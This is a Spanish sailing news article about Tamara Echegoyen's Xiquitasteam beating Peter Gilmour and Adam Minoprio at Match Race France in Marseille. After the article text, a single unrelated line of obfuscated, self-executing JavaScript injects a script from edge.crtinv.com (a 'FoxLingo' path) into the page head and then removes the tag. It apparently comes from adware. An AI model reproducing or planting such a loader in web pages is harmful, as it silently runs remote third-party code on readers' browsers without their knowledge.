Portada ›› Vela ›› Match Race ›› Las Xiquitasteam vencen a a Gilmour y Minoprio demostrando su gran clase en el Match Race Francia

Las Xiquitasteam vencen a a Gilmour y Minoprio demostrando su gran clase en el Match Race Francia

Las Xiquitasteam vencen a a Gilmour y Minoprio demostrando su gran clase en el  Match Race Francia

Sigue el fumeque en Marsella que provoca regatas muy técnicas y físicas. La xiquitasteam de Tamara Echegoyen con dos victorias, sobre dos de los mejores patrones del mundo de Match, demuestran que las mujeres tienen su lugar en match race.

Mucho viento y mar en aguas marsellesas en esta gris y lluviosa segunda jornada del Match Race France que están disputando las mejores tripulaciones del ranking de la modalidad y a las que han sido invitadas las actuales medallas de oro femenino en Londres 2012.
Una modalidad cuya élite hasta ahora siempre fue dominada por hombres, con las féminas relegadas a regatas de féminas y con el paso vetado a medirse con los monstruos.
Pero hoy en Marsella se ha demostrado que es un puro anacronísmo, Tamara, Angela, Sofía, Pilar y Espe se peléan con un barco nuevo en competición para ellas, el J-80, con unas conficiones de viento y mar, duras, con sus entrenos parados por las celebraciones olímpicas y con todo esto son capaces de ganar nada más ni nada menos que a un Peter Gilmour y a Adam Minoprio. Sin duda una pica en Flandes.
No pasan a cuartos de final pero han dejado una grata sensación al entendido aficionado francés y se han ganado el respeto de los considerados ases de la modalidad.

tamara

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();